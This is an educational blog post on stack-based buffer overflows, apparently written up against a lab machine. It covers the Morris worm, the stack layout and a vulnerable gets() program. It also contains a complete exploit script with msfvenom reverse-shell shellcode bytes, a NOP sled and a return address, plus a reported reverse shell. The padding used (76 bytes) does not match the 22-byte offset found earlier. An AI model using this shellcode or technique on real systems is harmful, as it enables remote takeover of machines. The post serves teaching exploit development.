In 1988, an exploit was unleashed on the internet from a computer at MIT. From colleges to NASA, thousands of machines connected to the internet were infected, in part by exploiting a stack-based buffer overflow. The Harvard graduate responsible was convicted and fined under the Computer Fraud and Abuse Act.
1988 marked the rise of the Internet. Robert Tappan Morris, the son of a renowned computer scientist and cryptographer, was also a genius. In a world where learning software development was not as easy as it is now, let alone grasping its concepts, Morris had a computer and a mentor at home: his father, who had contributed to early versions of Unix, including the math library, the dc programming language, and the crypt program. In a time when there was no scrolling addiction and time passed slowly, Morris spent his time working with computers and building software programs.
Morris developed a program that shifted the software industry model to a whole new level. Not only did he create a sophisticated program, but he also exploited a security vulnerability that became a bug class of its own. Bugs from this same class are still being discovered to this day. Imagine building a plane today—it's not as special as being the one who invented the plane and flew it for the first time.
The following blog will cover the buffer overflow vulnerability and how it can be exploited to hack a machine.
Introduction
A stack-based buffer overflow occurs when more data is written to a buffer on the stack than the buffer can hold. If an 8-byte buffer is allocated on the stack and more than 8 bytes are stored in it, the extra bytes overwrite the adjacent memory locations on the stack, which typically causes the program to crash.
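To make the 8-byte example concrete, here is a minimal sketch in Python. It is only a toy model: the bytearray stands in for stack memory, and the names unchecked_copy and memory, as well as the neighbouring value, are made up for illustration. Real stack memory is laid out by the compiler, not like this.

```python
# Toy model: an 8-byte buffer followed directly by a 4-byte neighbouring value.
BUFFER_SIZE = 8

def unchecked_copy(memory: bytearray, data: bytes) -> None:
    """Copy data to the start of memory without checking the buffer size."""
    for i, byte in enumerate(data):
        memory[i] = byte

# Buffer (8 zero bytes) + neighbour (hypothetical value).
memory = bytearray(BUFFER_SIZE) + bytearray(b"\xef\xbe\xad\xde")

unchecked_copy(memory, b"A" * 8)        # fits exactly, neighbour untouched
before = memory[BUFFER_SIZE:].hex()
print(before)                           # efbeadde

unchecked_copy(memory, b"A" * 12)       # 4 bytes too long
after = memory[BUFFER_SIZE:].hex()
print(after)                            # 41414141
```

The second copy silently replaces the neighbouring value with 'A' bytes (0x41), which is exactly what happens to whatever sits next to an overflowed buffer.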
The question arises: how can this crash be leveraged to compromise the entire machine?
Technical details
Stack
Human beings have two hands, and they can hold two basketballs at a time. If someone throws another basketball at me, I will put one of the basketballs on the table so my hand gets free, and I will catch the next basketball. Now, I have two basketballs in my hands and a third one on the table. If someone keeps throwing the basketballs at me, I will keep repeating the process—placing a basketball on the table and catching the next basketball.
That table is just like the stack in computer architecture, and hands represent CPU registers. Both serve the purpose of holding data. The stack stores local variables, function parameters, or any kind of data that is being stored temporarily until execution is finished. Every function call gets its own stack frame. The stack runs in LIFO mode—last in, first out.
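The last in, first out behaviour of the table can be sketched with a plain Python list. This only models the ordering, not real stack memory.

```python
stack = []                # the "table"

stack.append("ball 1")    # push
stack.append("ball 2")
stack.append("ball 3")

top = stack.pop()         # pop returns the most recently pushed item
print(top)                # ball 3
print(stack)              # ['ball 1', 'ball 2']
```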
 direction    |---------------------|                    ^
 of stack     | Space for arguments | <== $esp (SP)      |
 growth       | to called routines  |                    |
    ^         |---------------------|                    |
    |         | Local variables,    |                    |
    |         | temporary values    |                    |
    |         |---------------------|                    |
    |         | Other callee-saved  |                    | Current
    |         | registers           |                    | stack
    |         |---------------------|                    | frame
    |         | Saved $ebp (FP)     | <== $ebp (FP)      |
    |         |---------------------|                    |
    |         | Return address      |                    |
P.S. I don’t want to bombard you with information regarding how many registers there are and what they do, but I will mention some that are required to understand the bug.
In 32-bit architecture:
EBP points at the bottom (base) of the stack frame
ESP points at the top of the stack frame
EIP points to the next instruction to be executed
Hence the names eBasePointer, eStackPointer, and eInstructionPointer. Explaining the “E” is outside the scope of this blog; if you are curious, you can visit this link.
Function calls: the hidden layer
Programs consist of multiple lines of code/instructions, and they run sequentially. There are multiple registers in computer architecture; one of them is called the “PC” (Program Counter) or “IP” (Instruction Pointer), which holds the address of the next instruction to be executed.
When a function is called, the sequential running of the program gets interrupted because the instruction pointer will jump to the implementation of the function. Before jumping to the implementation of the function, the address of the instruction right after the function call gets stored on the stack so the “IP” (Instruction Pointer) can return to it after completing the implementation of the function. It is called the return address because we return to it after completing the function.
Stack during Function call. (Copied)
After completion of the function, the instruction pointer returns to the address that was stored on the stack, and the program resumes executing sequentially as before. Calling a function, in simple words, is: “Store the address of the instruction right after the call, jump to the function implementation, execute its code, and return to the address that was stored earlier.”
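#include <stdio.h>

/* Does nothing; it exists only so the call and return can be observed. */
void func(void) {
    return;
}

int main(void) {
    func();                 /* the address of the next instruction is pushed here */
    printf("Hello Mars!");
    return 0;
}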
The above program has been compiled and is being analyzed in the debugger.
The arrow indicates the EIP.
Top of stack before function call
EIP points at the “call 0x804841d <func>” instruction, which is about to be executed. The top of the stack currently holds an unrelated address that points to zero. Once this instruction executes, the top of the stack should hold the address 0x8048431 so that EIP can come back to it after func() completes.
Top of stack after call instruction
As soon as the call instruction is executed, the return address/next address after the call instruction is pushed onto the stack. ESP points at 0x8048431 <main+14>, and EIP is inside the func();
So far, we should know 5 things straight away:
How a function call works at a lower level
EBP: Indicates the base of the stack frame
ESP: Points at the top of the stack frame
Return Address: The address to return to after the function execution is complete
EIP: Points at the next instruction to be executed
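The call and return sequence described above can be sketched as a tiny simulation. The ToyCPU class is hypothetical and models only EIP and a stack of addresses. The addresses 0x804841d and 0x8048431 come from the debugger session above; the address of the call instruction itself (0x804842c) and its 5-byte length are assumptions based on the usual encoding of a near call on 32-bit x86.

```python
class ToyCPU:
    """Very small model: an instruction pointer and a stack of addresses."""

    def __init__(self, eip: int):
        self.eip = eip
        self.stack = []

    def call(self, target: int, call_size: int = 5) -> None:
        # Push the address of the instruction after the call, then jump.
        self.stack.append(self.eip + call_size)
        self.eip = target

    def ret(self) -> None:
        # Pop the saved return address back into EIP.
        self.eip = self.stack.pop()


cpu = ToyCPU(eip=0x804842c)     # assumed address of the call instruction
cpu.call(0x804841d)             # call func
saved = cpu.stack[-1]
print(hex(saved))               # 0x8048431, the return address on top of the stack
print(hex(cpu.eip))             # 0x804841d, EIP is now inside func

cpu.ret()
print(hex(cpu.eip))             # 0x8048431, execution resumes after the call
```

Note that ret simply trusts whatever value is on top of the stack. That trust is what a buffer overflow abuses.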
Vulnerability Analysis
gets() is a pre-defined function in C that is used to read a string or a text line and store the input in a well-defined string variable. The function terminates its reading session as soon as it encounters a newline character.
P.S. The gets() function is probably the most unsafe function that was ever in the C standard library.
It is unsafe because there is no way to prevent a buffer overflow. The function accepts input from the user and stores it in a buffer. It does not perform bounds checking on the size of its input.
2buff.c
#include <stdio.h>

int main() {
    char buffer[10];
    printf("Enter some text: ");
    // Using gets() - Vulnerable!
    gets(buffer);
    printf("You entered: %s\n", buffer);
    return 0;
}
You can compile this binary on your local machine using
The vulnerability arises when the input stored in the buffer is larger than the buffer’s capacity: the excess bytes smash (overwrite) the return address on the stack. Suppose the return address is overwritten with a garbage value such as AAAA. This is not a valid memory address, so when the function returns and the CPU tries to execute code at that address, the program crashes. Let’s send a long string of 'A's.
The program’s happy flow
Let’s analyze the bug in GDB by sending a long string of 'A's.
EIP and ESP pointing to user supplied data due to buffer overflow.
Program Crashed because EIP tried to access invalid Address 0x41414141
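The address 0x41414141 in the crash is simply four 'A' characters read as a 32-bit number, which can be checked with Python's struct module:

```python
import struct

overwritten = b"AAAA"                           # four input bytes that landed on the return address
(address,) = struct.unpack("<I", overwritten)   # read them as a little-endian 32-bit value

print(hex(ord("A")))    # 0x41
print(hex(address))     # 0x41414141
```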
Since we control the return address, if we can make the program return to an invalid address like AAAA, we can make the program return to a valid address as well, and the EIP will start executing the code from that address. Our goal is to place shellcode on the stack and set the stack address in EIP to execute the shellcode.
Shellcode
Shellcode is a set of machine instructions, written as raw bytes (called byte code in this blog), that the CPU executes directly. A compiled program ultimately consists of such bytes, so its instructions can be extracted and served to the CPU, where they perform exactly the same task the original program was supposed to do.
Byte code has been extracted from an ELF binary "testcode" using a tool called objdump. Similarly, any program’s byte code can be extracted and served to the CPU. There are also a couple of tools that generate the shellcode, but they are only helpful in particular scenarios.
Byte code of a program written in the C language.
Shellcode written directly in assembly language tends to be more compact and gives more control than shellcode derived from other languages, which makes it easier to deal with blockers that would otherwise break the shellcode or get in the way of its execution.
In this blog, we are going to use msfvenom to generate shellcode and use it to exploit the bug.
-p specifies the payload to generate. In our case, it is a payload for Linux x86.
-f specifies the output format of the payload. In the current scenario, it is Python; rb, exe, and js are other examples.
CMD is the command executed when the payload triggers.
Linux’s execve system call will be called, and the /bin/bash program will be executed.
Exploit Development
The goal is to find the offset to overwrite the EIP, place the stack address in it, and place our shellcode on the stack.
AAAAAAAAAAAAAAAAAAAAA Stack Address Shellcode
.___...
There are multiple tools available to assist in exploit development, which can be integrated with GDB to analyze and debug the binary. I will be using Python Exploit Development Assistance for GDB, also known as PEDA.
To find the offset to EIP, instead of sending a bunch of 'A's, I will send a unique pattern of 50 characters, then identify which substring of the unique pattern appears in the EIP.
Unique pattern created via PEDA
Unique Pattern appears in EIP register
Looking up the position of that substring within the unique pattern gives the exact offset to EIP.
Offset to EIP
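The idea behind the unique pattern can be sketched in a few lines of Python. This is not PEDA's own algorithm; it is a simple stand-in that produces “Aa0Aa1Aa2...” style text, and the function names make_pattern and find_offset are hypothetical. The EIP value below is faked by slicing the pattern at the offset found in this walkthrough; in practice it would be read from the debugger after the crash.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def make_pattern(length: int) -> bytes:
    """Build 'Aa0Aa1Aa2...' text; 4-byte windows are unique for short lengths like 50."""
    text = ""
    for triple in product(ascii_uppercase, ascii_lowercase, digits):
        if len(text) >= length:
            break
        text += "".join(triple)
    return text[:length].encode()

def find_offset(pattern: bytes, eip_value: int) -> int:
    """Return the index in pattern of the 4 bytes seen in EIP (little-endian), or -1."""
    return pattern.find(struct.pack("<I", eip_value))

pattern = make_pattern(50)
print(pattern[:12])                                     # b'Aa0Aa1Aa2Aa3'

# Stand-in for the value GDB would show in EIP after the crash.
fake_eip = struct.unpack("<I", pattern[22:26])[0]
offset = find_offset(pattern, fake_eip)
print(offset)                                           # 22
```

Because every 4-byte window in the pattern occurs only once, the bytes that end up in EIP identify exactly one position in the input.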
The 4 bytes that follow the initial 22 bytes end up in EIP. Let’s verify this.
EIP in control
Next, EIP is overwritten with the ESP address to see whether the execution flow jumps to the stack. A breakpoint byte, \xCC, is placed at the top of the stack, followed by 100 'C' characters that mark where our shellcode will go. If execution does jump to the top of the stack, the CPU will hit the breakpoint and GDB will report a SIGTRAP, with our 'C's right after it.
According to the payload, the execution flow should now jump to the stack, and EIP should point at the breakpoint followed by the 'C's. If this happens, it means I can place shellcode instead of a bunch of 'C's, and the malicious code will be executed.
EIP points at the top of stack
Stack contains our 100 C chars and a break-point byte code cc
Note: \xcc has nothing to do with the character 'C'; any character could be used as filler instead of 'C'. \xcc is the fixed machine-code byte for a breakpoint instruction (int3 on x86), which tells the CPU to pause execution for debugging.
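The test payload described above could be assembled roughly as follows. This is a sketch under assumptions: OFFSET uses the 22 bytes found earlier, and ESP_ADDRESS is a placeholder that must be replaced with the stack address observed in your own GDB session.

```python
import struct

OFFSET = 22                   # bytes before the saved return address (from the pattern step)
ESP_ADDRESS = 0xbffff6f8      # placeholder; read the real value from GDB

test_payload = b"A" * OFFSET                        # padding up to the return address
test_payload += struct.pack("<I", ESP_ADDRESS)      # value that ends up in EIP
test_payload += b"\xcc"                             # int3 breakpoint byte
test_payload += b"C" * 100                          # filler where shellcode will go

print(len(test_payload))                 # 127
print(hex(test_payload[OFFSET + 4]))     # 0xcc
```

If GDB stops with SIGTRAP when the program is fed this input, the jump to the stack works and the filler can be swapped for shellcode.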
Now it is time to remove the C characters and place shellcode there. Msfvenom will be used to generate the shellcode. And what our shellcode will do is initiate a reverse shell.
A reverse shell is a type of connection that is established when a script or malicious code is run on the victim’s machine. It creates a connection with the attacker’s machine, and the attacker gets complete access to the victim’s terminal/shell. This is the easiest way to understand a reverse shell.
Usage of msfvenom, a built-in program in Kali Linux
-p indicates the type of payload. In this case, a TCP reverse shell for the Linux x86 platform is generated.
-b lists the bad characters that must not be present in the shellcode; otherwise, the shellcode will break. In the current scenario, \x0a is the newline (line feed) character, \x0d is the carriage return, and \x00 is the null byte. As soon as the gets() function receives a newline, it stops taking further input, and the null byte marks the end of a string. For that reason, these bytes must not be present in the shellcode.
LHOST indicates the IP address of the machine that is going to catch the reverse shell.
LPORT indicates the port of the machine that is going to catch the reverse shell.
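Before using generated shellcode, it can be worth double-checking that none of the bad characters slipped in. A minimal sketch of such a check follows; the helper name find_bad_chars and the sample byte strings are made up for illustration.

```python
BAD_CHARS = b"\x00\x0a\x0d"   # null byte, line feed, carriage return

def find_bad_chars(shellcode: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, byte value) pairs for every bad byte found in shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]

clean = b"\x31\xc0\x50\x68"           # sample bytes without bad characters
dirty = b"\x31\xc0\x0a\x68\x00"       # sample bytes containing \x0a and \x00

print(find_bad_chars(clean))          # []
print(find_bad_chars(dirty))          # [(2, 10), (4, 0)]
```

An empty list means the input should reach the buffer intact; any hit shows the offset at which the input would be cut short or altered.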
exploit.py
import struct
buf = b""
buf += b"\xdb\xc5\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf"
buf += b"\xd4\xe5\xea\x91\x31\x7e\x17\x03\x7e\x17\x83\x12"
buf += b"\xe1\x08\x64\xab\x31\x3b\x64\x98\x86\x97\x01\x1c"
buf += b"\x80\xf9\x66\x46\x5f\x79\x15\xdf\xef\x45\xd7\x5f"
buf += b"\x46\xc3\x1e\x37\x99\x9b\x85\xd7\x71\xde\x45\xd7"
buf += b"\xfa\x57\xa4\x67\x9a\x37\x76\xd4\xd0\xbb\xf1\x3b"
buf += b"\xdb\x3c\x53\xd3\x8a\x13\x27\x4b\x3b\x43\xe8\xe9"
buf += b"\xd2\x12\x15\xbf\x77\xac\x3b\x8f\x73\x63\x3b"
# Shellcode generated via msfvenom for a reverse shell
ret_addr = struct.pack("<I", 0xbffff6f8)
# Return address packed as a little-endian 32-bit value for the x86 architecture
payload = b"A" * 76 + ret_addr + b"\x90" * 16 + buf
# '\x90' is the x86 NOP (no operation) instruction: it does nothing, and execution
# simply continues with the next instruction. Used here as padding before the shellcode
with open("/var/tmp/sHellcode/poc.txt", "wb") as f:
    f.write(payload)
# The payload above is stored in poc.txt, which will be served to the program
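The byte order of the return address matters because x86 is little-endian: the least significant byte is stored first. A short sketch of what struct.pack produces for the address used in exploit.py is shown below. The "<" prefix requests little-endian explicitly; without a prefix, struct uses the byte order of the machine running the script.

```python
import struct

address = 0xbffff6f8

little = struct.pack("<I", address)   # byte order expected by x86
big = struct.pack(">I", address)      # shown only for comparison

print(little.hex())   # f8f6ffbf
print(big.hex())      # bffff6f8
```

Writing the address into the payload in big-endian order would make the CPU read a different address entirely.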
Program executed with the above payload
Reverse Shell received from warzone machine
Real World Examples
Case Study
The Morris worm exploited a flaw in the sendmail program, a common email utility on Unix systems.
The worm described in the background section also exploited a buffer overflow vulnerability within the fingerd (finger daemon) service. By sending carefully crafted, excessively long input to the fingerd service, the worm could overwrite memory locations, allowing it to inject and execute its own malicious code. This is the specific buffer overflow that the Morris worm used.
EternalBlue
A bug in the Windows SMBv1 implementation was reportedly exploited by the National Security Agency (NSA) from 2013 to 2017, until a hacker group, the Shadow Brokers, obtained the NSA's exploits and released them publicly. This turned into a disaster for unpatched Windows machines connected to the internet when the WannaCry ransomware began spreading.
There's a security flaw in how Windows handles the SMBv1 protocol. Specifically, when the system processes File Extended Attributes (FEAs), a function in the operating system's core (kernel) can accidentally overflow a memory area called the Large Non-Paged Pool.
This happens when the system goes through the FEA list and tries to turn it into a different format (NTFEA LIST). Due to a miscalculation in the total size of the data, it ends up writing more than the memory can handle, causing the overflow.
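To give a feel for how a size miscalculation can lead to an overflow, here is a generic sketch. It is not the Windows code, and the function name and values are hypothetical. It shows one common form of the mistake: a 32-bit size field is updated through a 16-bit write, so its upper half keeps a stale value and the recorded size ends up larger than the real data.

```python
def update_low_word(total: int, new_size: int) -> int:
    """Overwrite only the low 16 bits of a 32-bit size field (the mistake)."""
    return (total & 0xFFFF0000) | (new_size & 0xFFFF)

recorded = 0x00010000      # hypothetical size as first recorded (65536 bytes)
actual = 0x0000FF5D        # hypothetical real size after the list was trimmed

buggy = update_low_word(recorded, actual)

print(hex(buggy))          # 0x1ff5d
print(buggy > actual)      # True
```

Any code that later trusts the larger recorded size while the destination was allocated for the smaller real size will write past the end of that allocation.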
WannaCry
“The WannaCry ransomware attack was a worldwide cyberattack in May 2017 by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in Bitcoin cryptocurrency.” - Wikipedia
WannaCry spread from machine to machine by using the EternalBlue exploit.
OS Mitigation
Cases like the ones above led operating system vendors to introduce mitigations that make exploitation harder, regardless of whether a vulnerability exists in any installed software. The types and details of these mitigations are beyond the scope of this blog. However, a cat-and-mouse game has been going on ever since, with nearly every mitigation having a bypass or workaround of some kind. Today, exploitation targets everything from pager devices to the latest iPhones.
Bug Still Known and Found
Google Chrome – VP8 Encoding Heap Buffer Overflow (CVE-2023-5217)
VLC Media Player – Heap-based buffer overflow vulnerability (CVE-2020-13428)
cURL – Heap overflow in cURL’s SOCKS5 proxy handshake (CVE-2023-38545)